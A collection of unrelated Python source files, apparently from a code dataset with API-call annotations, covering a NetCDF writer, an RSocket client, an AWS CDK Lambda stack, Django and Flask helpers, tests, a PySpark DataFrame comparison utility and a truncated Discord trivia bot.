Bunch(data=hgt,name="HGT", dims=d2dname,dtype="f",attributes=dict(units="m", description="Terrain Elevation"))
]
fileexists=glob.glob(filename) or glob.glob(filename+".nc")
if fileexists:
print("Removing : "+fileexists[0])
os.remove(fileexists[0])
io.write(filename, u,varname="U", dims=d4dname,dtype="f",attributes=dict(units="m/s",description="Horizontal (x) wind speed"),
extravars=othervars)
if __name__ == '__main__':
main()
| [
"numpy.arange",
"numpy.diff",
"numpy.zeros",
"load_data.cols",
"numpy.meshgrid",
"glob.glob",
"os.remove"
] | [((436, 460), 'load_data.cols', 'load_data.cols', (['filename'], {}), '(filename)\n', (450, 460), False, 'import load_data\n'), ((1074, 1109), 'numpy.arange', 'np.arange', (['(0)', '(nz * base.dz)', 'base.dz'], {}), '(0, nz * base.dz, base.dz)\n', (1083, 1109), True, 'import numpy as np\n'), ((1113, 1138), 'glob.glob', 'glob.glob', (['"""sounding.txt"""'], {}), "('sounding.txt')\n", (1122, 1138), False, 'import glob, os\n'), ((1569, 1600), 'numpy.arange', 'np.arange', (['lonmin', 'lonmax', 'dlon'], {}), '(lonmin, lonmax, dlon)\n', (1578, 1600), True, 'import numpy as np\n'), ((1607, 1638), 'numpy.arange', 'np.arange', (['latmin', 'latmax', 'dlat'], {}), '(latmin, latmax, dlat)\n', (1616, 1638), True, 'import numpy as np\n'), ((1649, 1670), 'numpy.meshgrid', 'np.meshgrid', (['lon', 'lat'], {}), '(lon, lat)\n', (1660, 1670), True, 'import numpy as np\n'), ((1246, 1271), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1254, 1271), True, 'import numpy as np\n'), ((1284, 1309), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1292, 1309), True, 'import numpy as np\n'), ((1322, 1347), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1330, 1347), True, 'import numpy as np\n'), ((1361, 1386), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1369, 1386), True, 'import numpy as np\n'), ((1401, 1426), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1409, 1426), True, 'import numpy as np\n'), ((1682, 1696), 'numpy.zeros', 'np.zeros', (['dims'], {}), '(dims)\n', (1690, 1696), True, 'import numpy as np\n'), ((1949, 1974), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1957, 1974), True, 'import numpy as np\n'), ((2010, 2035), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (2018, 2035), True, 'import numpy as np\n'), ((3613, 3632), 'glob.glob', 'glob.glob', (['filename'], {}), '(filename)\n', (3622, 3632), False, 'import glob, os\n'), ((3636, 3663), 'glob.glob', 'glob.glob', (["(filename + '.nc')"], {}), "(filename + '.nc')\n", (3645, 3663), False, 'import glob, os\n'), ((3732, 3756), 'os.remove', 'os.remove', (['fileexists[0]'], {}), '(fileexists[0])\n', (3741, 3756), False, 'import glob, os\n'), ((527, 552), 'numpy.diff', 'np.diff', (['data[:nz + 1, 0]'], {}), '(data[:nz + 1, 0])\n', (534, 552), True, 'import numpy as np\n'), ((1711, 1736), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1719, 1736), True, 'import numpy as np\n'), ((981, 1022), 'numpy.arange', 'np.arange', (['(273.0)', '(300)', '((300 - 273.0) / nz)'], {}), '(273.0, 300, (300 - 273.0) / nz)\n', (990, 1022), True, 'import numpy as np\n'), ((1454, 1472), 'numpy.arange', 'np.arange', (['dims[2]'], {}), '(dims[2])\n', (1463, 1472), True, 'import numpy as np\n')] |
import asyncio
import logging
import sys
from pathlib import Path
from aioquic.quic.configuration import QuicConfiguration
from rsocket.helpers import single_transport_provider
from rsocket.payload import Payload
from rsocket.rsocket_client import RSocketClient
from rsocket.transports.aioquic_transport import rsocket_connect
async def main(server_port):
logging.info('Connecting to server at localhost:%s', server_port)
client_configuration = QuicConfiguration(
is_client=True
)
ca_file_path = Path(__file__).parent / 'certificates' / 'pycacert.pem'
client_configuration.load_verify_locations(cafile=str(ca_file_path))
async with rsocket_connect('localhost', server_port,
configuration=client_configuration) as transport:
async with RSocketClient(single_transport_provider(transport)) as client:
payload = Payload(b'%Y-%m-%d %H:%M:%S')
async def run_request_response():
try:
while True:
result = await client.request_response(payload)
logging.info('Response: {}'.format(result.data))
await asyncio.sleep(1)
except asyncio.CancelledError:
pass
task = asyncio.create_task(run_request_response())
await asyncio.sleep(5)
task.cancel()
await task
if __name__ == '__main__':
port = sys.argv[1] if len(sys.argv) > 1 else 6565
logging.basicConfig(level=logging.DEBUG)
asyncio.run(main(port))
| [
"logging.basicConfig",
"aioquic.quic.configuration.QuicConfiguration",
"pathlib.Path",
"rsocket.payload.Payload",
"rsocket.helpers.single_transport_provider",
"asyncio.sleep",
"rsocket.transports.aioquic_transport.rsocket_connect",
"logging.info"
] | [((364, 429), 'logging.info', 'logging.info', (['"""Connecting to server at localhost:%s"""', 'server_port'], {}), "('Connecting to server at localhost:%s', server_port)\n", (376, 429), False, 'import logging\n'), ((458, 491), 'aioquic.quic.configuration.QuicConfiguration', 'QuicConfiguration', ([], {'is_client': '(True)'}), '(is_client=True)\n', (475, 491), False, 'from aioquic.quic.configuration import QuicConfiguration\n'), ((1527, 1567), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG'}), '(level=logging.DEBUG)\n', (1546, 1567), False, 'import logging\n'), ((670, 747), 'rsocket.transports.aioquic_transport.rsocket_connect', 'rsocket_connect', (['"""localhost"""', 'server_port'], {'configuration': 'client_configuration'}), "('localhost', server_port, configuration=client_configuration)\n", (685, 747), False, 'from rsocket.transports.aioquic_transport import rsocket_connect\n'), ((897, 926), 'rsocket.payload.Payload', 'Payload', (["b'%Y-%m-%d %H:%M:%S'"], {}), "(b'%Y-%m-%d %H:%M:%S')\n", (904, 926), False, 'from rsocket.payload import Payload\n'), ((525, 539), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (529, 539), False, 'from pathlib import Path\n'), ((826, 862), 'rsocket.helpers.single_transport_provider', 'single_transport_provider', (['transport'], {}), '(transport)\n', (851, 862), False, 'from rsocket.helpers import single_transport_provider\n'), ((1374, 1390), 'asyncio.sleep', 'asyncio.sleep', (['(5)'], {}), '(5)\n', (1387, 1390), False, 'import asyncio\n'), ((1202, 1218), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1215, 1218), False, 'import asyncio\n')] |
import inspect
import importlib
import pkgutil
import Plugins
from .PluginBase import PluginBase
class PluginsLoader:
def __init__(self):
pass
@staticmethod
def __iter_namespace(ns_pkg):
return pkgutil.iter_modules(ns_pkg.__path__, ns_pkg.__name__ + ".")
def load(self):
result = []
for _, name, is_pkg in self.__iter_namespace(Plugins):
if not is_pkg:
continue
module = importlib.import_module(name)
plugin_classes = inspect.getmembers(module, inspect.isclass)
if len(plugin_classes) != 1:
print('\'' + name + '\': plugin module must import exactly one class')
continue
plugin_class = plugin_classes[0][1]
if not issubclass(plugin_class, PluginBase):
print('\'' + name + '\': plugin class must inherit from IBotPlugin')
continue
result.append(plugin_class)
return result
| [
"inspect.getmembers",
"importlib.import_module",
"pkgutil.iter_modules"
] | [((227, 287), 'pkgutil.iter_modules', 'pkgutil.iter_modules', (['ns_pkg.__path__', "(ns_pkg.__name__ + '.')"], {}), "(ns_pkg.__path__, ns_pkg.__name__ + '.')\n", (247, 287), False, 'import pkgutil\n'), ((467, 496), 'importlib.import_module', 'importlib.import_module', (['name'], {}), '(name)\n', (490, 496), False, 'import importlib\n'), ((526, 569), 'inspect.getmembers', 'inspect.getmembers', (['module', 'inspect.isclass'], {}), '(module, inspect.isclass)\n', (544, 569), False, 'import inspect\n')] |
from aws_cdk import (
Stack,
aws_sns as sns,
aws_sqs as sqs,
aws_lambda as _lambda,
aws_lambda_destinations as destination,
)
from constructs import Construct
from dlq import core_lambda
class LambdaSnsDlqDestinationStack(Stack):
def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
"""
Constructor for Lambda function with SNS as event source as well as Lambda Destinations and DLQ
for un-successfully processed events.
Args:
scope (Construct): the scope object, all child constructs are defined within this scope.
construct_id(str): id for the construct, used uniquely.
"""
super().__init__(scope, construct_id, **kwargs)
# create SNS topic for aggregate data notification.
topic = sns.Topic(self, "topic", display_name="topic", topic_name="lambda_topic")
# create lambda function.
function = create_lambda_with_dlq_destination(self, "lambda", function_name="dlq_lambda",
handler="lambda.handler", path="dlq/function", **kwargs)
# associate lambda with sns as event source.
core_lambda.add_sns_event_source(self, function, topic)
def create_lambda_with_dlq_destination(scope: Construct, construct_id: str, function_name: str, handler: str,
path: str, **kwargs) -> _lambda.Function:
"""
Create lambda function with have DLQ and Destinations.
Args:
scope (Construct): the scope object, all child constructs are defined within this scope.
construct_id(str): id for the construct, used uniquely.
function_name(str): name of lambda function.
handler: name of method that Lambda calls to execute function.
path: source code path of Lambda function.
"""
# create lambda on success destination.
on_success = destination.SqsDestination(
sqs.Queue(scope, "lambda-on-success_destination", retention_period=core_lambda.retention_period,
visibility_timeout=core_lambda.visibility_timeout))
on_failure = destination.SqsDestination(
sqs.Queue(scope, "lambda-on-failure-destination", retention_period=core_lambda.retention_period,
visibility_timeout=core_lambda.visibility_timeout))
function = _lambda.Function(scope, construct_id,
function_name=function_name,
runtime=_lambda.Runtime.PYTHON_3_9,
handler=handler, code=_lambda.Code.from_asset(path=path),
dead_letter_queue_enabled=True,
retry_attempts=core_lambda.lambda_retry_attempt,
on_success=on_success,
on_failure=on_failure,
timeout=core_lambda.lambda_timeout, **kwargs)
return function
| [
"dlq.core_lambda.add_sns_event_source",
"aws_cdk.aws_sqs.Queue",
"aws_cdk.aws_lambda.Code.from_asset",
"aws_cdk.aws_sns.Topic"
] | [((822, 895), 'aws_cdk.aws_sns.Topic', 'sns.Topic', (['self', '"""topic"""'], {'display_name': '"""topic"""', 'topic_name': '"""lambda_topic"""'}), "(self, 'topic', display_name='topic', topic_name='lambda_topic')\n", (831, 895), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n'), ((1201, 1256), 'dlq.core_lambda.add_sns_event_source', 'core_lambda.add_sns_event_source', (['self', 'function', 'topic'], {}), '(self, function, topic)\n', (1233, 1256), False, 'from dlq import core_lambda\n'), ((1969, 2126), 'aws_cdk.aws_sqs.Queue', 'sqs.Queue', (['scope', '"""lambda-on-success_destination"""'], {'retention_period': 'core_lambda.retention_period', 'visibility_timeout': 'core_lambda.visibility_timeout'}), "(scope, 'lambda-on-success_destination', retention_period=\n core_lambda.retention_period, visibility_timeout=core_lambda.\n visibility_timeout)\n", (1978, 2126), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n'), ((2189, 2346), 'aws_cdk.aws_sqs.Queue', 'sqs.Queue', (['scope', '"""lambda-on-failure-destination"""'], {'retention_period': 'core_lambda.retention_period', 'visibility_timeout': 'core_lambda.visibility_timeout'}), "(scope, 'lambda-on-failure-destination', retention_period=\n core_lambda.retention_period, visibility_timeout=core_lambda.\n visibility_timeout)\n", (2198, 2346), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n'), ((2593, 2627), 'aws_cdk.aws_lambda.Code.from_asset', '_lambda.Code.from_asset', ([], {'path': 'path'}), '(path=path)\n', (2616, 2627), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n')] |
from dateutil import tz
from django.http.response import JsonResponse
from 臺灣言語平臺.項目模型 import 平臺項目表
from 臺灣言語資料庫.資料模型 import 來源表
from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應
from django.core.exceptions import ObjectDoesNotExist
_臺北時間 = tz.gettz('Asia/Taipei')
_時間輸出樣式 = '%Y-%m-%d %H:%M:%S'
def 轉做臺北時間字串(時間物件):
return 時間物件.astimezone(_臺北時間).strftime(_時間輸出樣式)
def 看資料詳細內容(request):
try:
平臺項目編號 = request.GET['平臺項目編號']
except KeyError:
return Json失敗回應({'錯誤': '沒有平臺項目的編號'})
try:
平臺項目 = 平臺項目表.揣編號(int(平臺項目編號))
資料 = 平臺項目.資料()
except ObjectDoesNotExist:
return Json失敗回應({'錯誤': '這不是合法平臺項目的編號'})
return JsonResponse({
'收錄者': str(資料.收錄者.編號()),
'來源': str(資料.來源.編號()),
'收錄時間': 轉做臺北時間字串(資料.收錄時間),
'種類': 資料.種類.種類,
'語言腔口': 資料.語言腔口.語言腔口,
'版權': 資料.版權.版權,
'著作所在地': 資料.著作所在地.著作所在地,
'著作年': 資料.著作年.著作年,
'屬性內容': 資料.屬性內容(),
'按呢講好': 平臺項目.按呢講好,
'按呢無好': 平臺項目.按呢無好
})
def 看來源內容(request):
try:
來源編號 = request.GET['來源編號']
except KeyError:
return Json失敗回應({'錯誤': '沒有來源編號的參數'})
try:
來源 = 來源表.objects.get(pk=來源編號)
except ObjectDoesNotExist:
return Json失敗回應({'錯誤': '這不是合法的來源編號'})
來源內容 = {
'名': 來源.名,
'屬性內容': 來源.屬性內容(),
}
try:
來源內容['email'] = 來源.使用者.email
來源內容['分數'] = 來源.使用者.分數
except Exception:
pass
return JsonResponse(來源內容)
def 投票(request):
try:
平臺項目編號 = request.POST['平臺項目編號']
decision = request.POST['decision']
except KeyError:
return Json失敗回應({'錯誤': '沒有平臺項目的編號'})
try:
rows_affect = 平臺項目表.這句講了按怎(平臺項目編號, decision)
except ValueError:
return Json失敗回應({'錯誤': 'decision傳錯了'})
return JsonResponse({
'suId': 平臺項目編號,
'success': True if rows_affect == 1 else False,
})
| [
"dateutil.tz.gettz",
"臺灣言語平臺.項目模型.平臺項目表.這句講了按怎",
"臺灣言語資料庫.資料模型.來源表.objects.get",
"臺灣言語平臺.介面.Json失敗回應.Json失敗回應",
"django.http.response.JsonResponse"
] | [((253, 276), 'dateutil.tz.gettz', 'tz.gettz', (['"""Asia/Taipei"""'], {}), "('Asia/Taipei')\n", (261, 276), False, 'from dateutil import tz\n'), ((1505, 1523), 'django.http.response.JsonResponse', 'JsonResponse', (['來源內容'], {}), '(來源內容)\n', (1517, 1523), False, 'from django.http.response import JsonResponse\n'), ((1858, 1936), 'django.http.response.JsonResponse', 'JsonResponse', (["{'suId': 平臺項目編號, 'success': True if rows_affect == 1 else False}"], {}), "({'suId': 平臺項目編號, 'success': True if rows_affect == 1 else False})\n", (1870, 1936), False, 'from django.http.response import JsonResponse\n'), ((1207, 1231), '臺灣言語資料庫.資料模型.來源表.objects.get', '來源表.objects.get', ([], {'pk': '來源編號'}), '(pk=來源編號)\n', (1222, 1231), False, 'from 臺灣言語資料庫.資料模型 import 來源表\n'), ((1743, 1773), '臺灣言語平臺.項目模型.平臺項目表.這句講了按怎', '平臺項目表.這句講了按怎', (['平臺項目編號', 'decision'], {}), '(平臺項目編號, decision)\n', (1755, 1773), False, 'from 臺灣言語平臺.項目模型 import 平臺項目表\n'), ((493, 522), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '沒有平臺項目的編號'}"], {}), "({'錯誤': '沒有平臺項目的編號'})\n", (501, 522), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((644, 676), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '這不是合法平臺項目的編號'}"], {}), "({'錯誤': '這不是合法平臺項目的編號'})\n", (652, 676), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1149, 1178), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '沒有來源編號的參數'}"], {}), "({'錯誤': '沒有來源編號的參數'})\n", (1157, 1178), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1276, 1306), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '這不是合法的來源編號'}"], {}), "({'錯誤': '這不是合法的來源編號'})\n", (1284, 1306), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1680, 1709), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '沒有平臺項目的編號'}"], {}), "({'錯誤': '沒有平臺項目的編號'})\n", (1688, 1709), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1814, 1845), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': 'decision傳錯了'}"], {}), "({'錯誤': 'decision傳錯了'})\n", (1822, 1845), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n')] |
# coding: utf-8
# 2021/8/2 @ tongshiwei
import pytest
from EduNLP import get_pretrained_i2v
from EduNLP.Vector.t2v import PRETRAINED_MODELS
from EduNLP.I2V.i2v import MODELS
from EduNLP.I2V import D2V
def test_pretrained_i2v(tmp_path):
PRETRAINED_MODELS["test"] = ["http://base.ustc.edu.cn/data/model_zoo/EduNLP/d2v/test_256.zip", "d2v"]
MODELS["test"] = [D2V, "test"]
d = tmp_path / "model"
d.mkdir()
get_pretrained_i2v("test", d)
with pytest.raises(KeyError):
get_pretrained_i2v("error")
get_pretrained_i2v("test", d)
| [
"EduNLP.get_pretrained_i2v",
"pytest.raises"
] | [((426, 455), 'EduNLP.get_pretrained_i2v', 'get_pretrained_i2v', (['"""test"""', 'd'], {}), "('test', d)\n", (444, 455), False, 'from EduNLP import get_pretrained_i2v\n'), ((532, 561), 'EduNLP.get_pretrained_i2v', 'get_pretrained_i2v', (['"""test"""', 'd'], {}), "('test', d)\n", (550, 561), False, 'from EduNLP import get_pretrained_i2v\n'), ((466, 489), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (479, 489), False, 'import pytest\n'), ((499, 526), 'EduNLP.get_pretrained_i2v', 'get_pretrained_i2v', (['"""error"""'], {}), "('error')\n", (517, 526), False, 'from EduNLP import get_pretrained_i2v\n')] |
import glob
import unittest
import os
from collections import namedtuple
from rappel import db
Result = namedtuple('response', 'word value tries found time')
class DBTestCreation(unittest.TestCase):
def setUp(self):
self.db_file_name = "temp/tu.db"
# do some house cleaning
if glob.glob(self.db_file_name):
os.remove(self.db_file_name)
def tearDown(self):
os.remove(self.db_file_name)
def test_create_db_file(self):
self.assertEqual(glob.glob(self.db_file_name), [])
myDb = db.db(self.db_file_name)
self.assertEqual(glob.glob(self.db_file_name), [self.db_file_name])
class DBTestUsage(unittest.TestCase):
def setUp(self):
self.db_file_name = "temp/tu.db"
# do some house cleaning
if glob.glob(self.db_file_name):
os.remove(self.db_file_name)
r1 = Result("toit", 1, 1, 1, 1)
r2 = Result("nez", 2, 2, 2, 2)
r3 = Result("mât", 3, 3, 3, 3)
self.myDb = db.db(self.db_file_name)
self.myDb.save("player1", [r1,r2])
self.myDb.save("player2", [r3])
# def tearDown(self):
# os.remove(self.db_file_name)
def test_save_sth(self):
results = self.myDb.read_all()
self.assertEqual(len(results), 3)
self.assertEqual(len(results[0]), 7)
self.assertEqual(results[0][0], "player1")
self.assertEqual(results[0][2], "toit")
def test_name(self):
players = self.myDb.read_field("name")
self.assertEqual(players[0][0], "player1")
self.assertEqual(players[2][0], "player2")
if __name__ == '__main__':
unittest.main() | [
"collections.namedtuple",
"unittest.main",
"rappel.db.db",
"glob.glob",
"os.remove"
] | [((106, 159), 'collections.namedtuple', 'namedtuple', (['"""response"""', '"""word value tries found time"""'], {}), "('response', 'word value tries found time')\n", (116, 159), False, 'from collections import namedtuple\n'), ((1463, 1478), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1476, 1478), False, 'import unittest\n'), ((289, 317), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (298, 317), False, 'import glob\n'), ((375, 403), 'os.remove', 'os.remove', (['self.db_file_name'], {}), '(self.db_file_name)\n', (384, 403), False, 'import os\n'), ((499, 523), 'rappel.db.db', 'db.db', (['self.db_file_name'], {}), '(self.db_file_name)\n', (504, 523), False, 'from rappel import db\n'), ((721, 749), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (730, 749), False, 'import glob\n'), ((901, 925), 'rappel.db.db', 'db.db', (['self.db_file_name'], {}), '(self.db_file_name)\n', (906, 925), False, 'from rappel import db\n'), ((322, 350), 'os.remove', 'os.remove', (['self.db_file_name'], {}), '(self.db_file_name)\n', (331, 350), False, 'import os\n'), ((456, 484), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (465, 484), False, 'import glob\n'), ((543, 571), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (552, 571), False, 'import glob\n'), ((754, 782), 'os.remove', 'os.remove', (['self.db_file_name'], {}), '(self.db_file_name)\n', (763, 782), False, 'import os\n')] |
from flask import Flask
from flask_assets import Bundle, Environment
from .. import app
bundles = {
'js': Bundle(
'js/graph.js',
'js/side_bar.js',
# 'js/regression.js',
# 'js/pca.js',
'js/script.js',
'js/entropy.js',
output='gen/script.js'
),
'css': Bundle(
'css/styles.css',
# 'css/bootstrap.css',
output='gen/styles.css'
)
}
assets = Environment(app)
assets.register(bundles)
| [
"flask_assets.Bundle",
"flask_assets.Environment"
] | [((447, 463), 'flask_assets.Environment', 'Environment', (['app'], {}), '(app)\n', (458, 463), False, 'from flask_assets import Bundle, Environment\n'), ((111, 211), 'flask_assets.Bundle', 'Bundle', (['"""js/graph.js"""', '"""js/side_bar.js"""', '"""js/script.js"""', '"""js/entropy.js"""'], {'output': '"""gen/script.js"""'}), "('js/graph.js', 'js/side_bar.js', 'js/script.js', 'js/entropy.js',\n output='gen/script.js')\n", (117, 211), False, 'from flask_assets import Bundle, Environment\n'), ((328, 377), 'flask_assets.Bundle', 'Bundle', (['"""css/styles.css"""'], {'output': '"""gen/styles.css"""'}), "('css/styles.css', output='gen/styles.css')\n", (334, 377), False, 'from flask_assets import Bundle, Environment\n')] |
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
def run(raven, inputs):
"""
Run method.
@ In, raven, object, RAVEN object
@ In, inputs, dict, input dictionary
@ Out, None
"""
# inputs: a, b, c
# outputs: d, e, f
# indices: d(), e(x), f(x, y)
a = raven.a
b = raven.b
c = raven.c
nx = 5
ny = 3
x = np.arange(nx) * 0.1
y = np.arange(ny) * 10
d = a*a
e = x * b
f = np.arange(nx*ny).reshape(nx, ny) * c
# save
raven.x = x
raven.y = y
raven.d = d
raven.e = e
raven.f = f
raven._indexMap = {'e': ['x'],
'f': ['x', 'y']
}
| [
"numpy.arange"
] | [((896, 909), 'numpy.arange', 'np.arange', (['nx'], {}), '(nx)\n', (905, 909), True, 'import numpy as np\n'), ((922, 935), 'numpy.arange', 'np.arange', (['ny'], {}), '(ny)\n', (931, 935), True, 'import numpy as np\n'), ((970, 988), 'numpy.arange', 'np.arange', (['(nx * ny)'], {}), '(nx * ny)\n', (979, 988), True, 'import numpy as np\n')] |
import os
from setuptools import setup, find_packages
import userpypi
def fread(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
try:
reqs = open(os.path.join(os.path.dirname(__file__), 'requirements.txt')).read()
except (IOError, OSError):
reqs = ''
setup(
name='userpypi',
version=userpypi.get_version(),
description="A Django application that emulates the Python Package Index.",
long_description=fread("README.rst")+"\n\n"+fread('Changelog.rst')+"\n\n"+fread('AUTHORS.rst'),
classifiers=[
"Framework :: Django",
"Development Status :: 4 - Beta",
#"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Environment :: Web Environment",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: BSD License",
"Topic :: System :: Software Distribution",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='django pypi packaging index',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
url='http://github.com/benliles/chishop',
license='BSD',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=reqs,
)
| [
"os.path.dirname",
"setuptools.find_packages",
"userpypi.get_version"
] | [((332, 354), 'userpypi.get_version', 'userpypi.get_version', ([], {}), '()\n', (352, 354), False, 'import userpypi\n'), ((1361, 1376), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (1374, 1376), False, 'from setuptools import setup, find_packages\n'), ((118, 143), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (133, 143), False, 'import os\n'), ((195, 220), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (210, 220), False, 'import os\n')] |
from service_user.models import UserModel
from django.core.exceptions import ValidationError
def get_user_instance_with_session_id(user_id, session_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
session_id__exact=session_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_session_id(user_id, session_id):
return get_user_instance_with_session_id(user_id, session_id) is not None
def get_user_instance_with_token_id(user_id, token_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
token_id__exact=token_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_token_id(user_id, token_id):
return get_user_instance_with_token_id(user_id=user_id, token_id=token_id) is not None
| [
"service_user.models.UserModel.objects.get"
] | [((183, 258), 'service_user.models.UserModel.objects.get', 'UserModel.objects.get', ([], {'user_id__exact': 'user_id', 'session_id__exact': 'session_id'}), '(user_id__exact=user_id, session_id__exact=session_id)\n', (204, 258), False, 'from service_user.models import UserModel\n'), ((610, 681), 'service_user.models.UserModel.objects.get', 'UserModel.objects.get', ([], {'user_id__exact': 'user_id', 'token_id__exact': 'token_id'}), '(user_id__exact=user_id, token_id__exact=token_id)\n', (631, 681), False, 'from service_user.models import UserModel\n')] |
# Copyright 2019 The DataFrame Show Reader Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyspark.sql import DataFrame
from pyspark.sql.types import StructField, StructType
def assert_equal(expected: DataFrame,
actual: DataFrame,
verbose: bool = True,
ignore_schema_metadata: bool = True):
"""Assert that two DataFrames contain the same data.
:param expected: The expected DataFrame
:param actual: The actual DataFrame
:param verbose: If the DataFrames are not equal, show
the DataFrame schema or data (depending on where the mismatch is) in order
to help debugging.
:param ignore_schema_metadata: When comparing the schemas, ignore the
metadata, which can include comments.
# comments.
:return: None
"""
if expected is None:
assert actual is None, \
'The expected DataFrame is None, but the actual DataFrame is not.'
return # Both DataFrames are None.
else:
assert actual is not None, \
'The actual DataFrame is None, but the expected DataFrame is not.'
expected.persist()
actual.persist()
expected_schema = _copy_without_metadata(expected.schema) if \
ignore_schema_metadata else expected.schema
actual_schema = _copy_without_metadata(actual.schema) if \
ignore_schema_metadata else actual.schema
is_schema_match = expected_schema == actual_schema
if not is_schema_match:
if verbose:
# Print the schema to help identify subtle cases such as one DF
# containing an INT and the other containing a BIGINT, which can be
# an issue if we try to write a DF containing a BIGINT into a
# previously existing Hive table defined to contain an INT.
print('Expected DataFrame schema:')
expected.printSchema()
print('Actual DataFrame schema:')
actual.printSchema()
assert is_schema_match is True, 'The DataFrame schemas differ.'
is_match = (0 == (expected.count() - actual.count()) ==
expected.subtract(actual).count() ==
actual.subtract(expected).count())
if not is_match:
if verbose:
print('Expected DataFrame:')
expected.show(20, False)
print('Actual DataFrame:')
actual.show(20, False)
# Possible future enhancement: Make the assertion failure message more
# helpful.
assert is_match is True, 'The DataFrames differ.'
def _copy_without_metadata(schema: StructType):
return StructType(
[StructField(f.name, f.dataType, f.nullable) for f in schema]
)
| [
"pyspark.sql.types.StructField"
] | [((3159, 3202), 'pyspark.sql.types.StructField', 'StructField', (['f.name', 'f.dataType', 'f.nullable'], {}), '(f.name, f.dataType, f.nullable)\n', (3170, 3202), False, 'from pyspark.sql.types import StructField, StructType\n')] |
from tempfile import TemporaryFile
import discord
#import requests
import json
import asyncio
from discord.ext import commands
import re
from random import randint
questions = ["When was NT founded?", "", "q3"]
answers = {
"Which of the following celebs went to NT? \na) <NAME> \nb) <NAME> \nc) <NAME> \nd) <NAME>" : "c",
"When was NTCI founded? \na) 1910 \nb) 1912\nc) 1915\nd) 1917" : "b",
"When did the first Maytime melodies take place? \na) May 1947 \nb) May 1940 \nc) May 1952 \nd) February 1952" : "a",
"How much money did NT raise in their first Charity Week that took place in 1986? \na) $1000 \nb) $1500 \nc) $2000 \nd) $3000" : "a",
